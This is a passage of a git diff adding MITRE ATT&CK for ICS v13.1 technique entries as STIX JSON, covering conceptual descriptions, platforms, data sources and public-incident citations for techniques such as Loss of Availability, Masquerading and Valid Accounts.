"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95.json new file mode 100644 index 0000000000000000000000000000000000000000..e6299f101ce045bba64689718c316b419360f992 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--b9eb05e2-f6bd-44ba-b56b-cbc19b9a3cd5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Availability", + "description": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAdversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.\n\nIn the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0826", + "external_id": "T0826" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54.json new file mode 100644 index 0000000000000000000000000000000000000000..d819c765380f24707fbba9f04f709165d25cf231 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--2b49e85d-5e42-4341-9d3f-41783b849af7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Theft of Operational Information", + "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0882", + "external_id": "T0882" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d.json new file mode 100644 index 0000000000000000000000000000000000000000..058a995be77f76e5b212c14bafa5304c871df70e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--b4312a29-3263-4291-a245-0f7334977be8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "System Firmware", + "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. \n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0857", + "external_id": "T0857" + }, + { + "source_name": "Basnight, Zachry, et al.", + "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ", + "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61.json new file mode 100644 index 0000000000000000000000000000000000000000..a4dec22c79b86970a69ba780dbe837a9f415ac9e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--c4ab8b27-b857-43c5-9754-159394b6a29a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Masquerading", + "description": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. \n\nApplications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Scheduled Job: Scheduled Job Creation", + "Service: Service Creation", + "Command: Command Execution", + "File: File Modification", + "Service: Service Modification", + "Process: Process Metadata", + "File: File Metadata", + "Scheduled Job: Scheduled Job Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0849", + "external_id": "T0849" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068.json new file mode 100644 index 0000000000000000000000000000000000000000..dc3dce7a8aea6153512bd7fe44786c6dbf1322b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--99cca7a3-7894-4a3b-bf46-e95b57711886", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Download", + "description": "Adversaries may perform a program download to transfer a user program to a controller. \n\nVariations of program download, such as online edit and program append, allow a controller to continue running during the transfer and reconfiguration process without interruption to process control. However, before starting a full program download (i.e., download all) a controller may need to go into a stop state. This can have negative consequences on the physical process, especially if the controller is not able to fulfill a time-sensitive action. Adversaries may choose to avoid a download all in favor of an online edit or program append to avoid disrupting the physical process. An adversary may need to use the technique Detect Operating Mode or Change Operating Mode to make sure the controller is in the proper mode to accept a program download.\n\nThe granularity of control to transfer a user program in whole or parts is dictated by the management protocol (e.g., S7CommPlus, TriStation) and underlying controller API. Thus, program download is a high-level term for the suite of vendor-specific API calls used to configure a controllers user program memory space. \n\n[Modify Controller Tasking](https://attack.mitre.org/techniques/T0821) and [Modify Program](https://attack.mitre.org/techniques/T0889) represent the configuration changes that are transferred to a controller via a program download.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0843", + "external_id": "T0843" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21.json new file mode 100644 index 0000000000000000000000000000000000000000..a936064ebbb8fbc7b22d8c3f8a96072eb1e38e7a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21.json @@ -0,0 +1,103 @@ +{ + "type": "bundle", + "id": "bundle--1feedcd4-6b17-4200-8d79-1dd0c6d7ab90", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. \n\nOperators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Control Server" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "File: File Access", + "Drive: Drive Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0847", + "external_id": "T0847" + }, + { + "source_name": "BBC April 2016", + "description": "BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 2019/10/14 ", + "url": "https://www.bbc.com/news/technology-36158606" + }, + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "source_name": "Christoph Steitz, Eric Auchard April 2016", + "description": "Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14 ", + "url": "https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS" + }, + { + "source_name": "Dark Reading Staff April 2016", + "description": "Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14 ", + "url": "https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298" + }, + { + "source_name": "ESET April 2016", + "description": "ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14 ", + "url": "https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/" + }, + { + "source_name": "Kernkraftwerk Gundremmingen April 2016", + "description": "Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14 ", + "url": "https://www.kkw-gundremmingen.de/presse.php?id=571" + }, + { + "source_name": "Lee Mathews April 2016", + "description": "Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 ", + "url": "https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/" + }, + { + "source_name": "Peter Dockrill April 2016", + "description": "Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14 ", + "url": "https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant" + }, + { + "source_name": "Sean Gallagher April 2016", + "description": "Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14 ", + "url": "https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/" + }, + { + "source_name": "Trend Micro April 2016", + "description": "Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14 ", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377.json new file mode 100644 index 0000000000000000000000000000000000000000..b34be6fb4128a91becf8a8972369aa5060ce6208 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--22219393-df8a-4029-8993-78c9e69e1c2a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0852", + "external_id": "T0852" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a.json new file mode 100644 index 0000000000000000000000000000000000000000..a843015adc95be0eecd4f07a8c7eb5471b73f8c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--c26a2f01-7ea4-4f37-8897-7f5a6a2f8063", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Hardcoded Credentials", + "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Aagam Shah, @neutrinoguy, ABB" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Data Historian", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Logon Session: Logon Session Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "created": "2022-09-29T13:35:38.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0891", + "external_id": "T0891" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101.json new file mode 100644 index 0000000000000000000000000000000000000000..edd5689fd8bdbc4765d780fd3cf3b3f1f79e6da1 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--dffc66e0-2db0-4196-bc70-bfac809a6493", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Valid Accounts", + "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Engineering Workstation", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Logon Session: Logon Session Creation", + "User Account: User Account Authentication" + ], + "type": "attack-pattern", + "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0859", + "external_id": "T0859" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618.json new file mode 100644 index 0000000000000000000000000000000000000000..93ee04eda0852432a9b4266e8906f2accef7f440 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--af819028-d807-42a7-8a30-35882dc5affb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-27T16:38:58.028Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) \n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. (Citation: The MITRE Corporation)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": 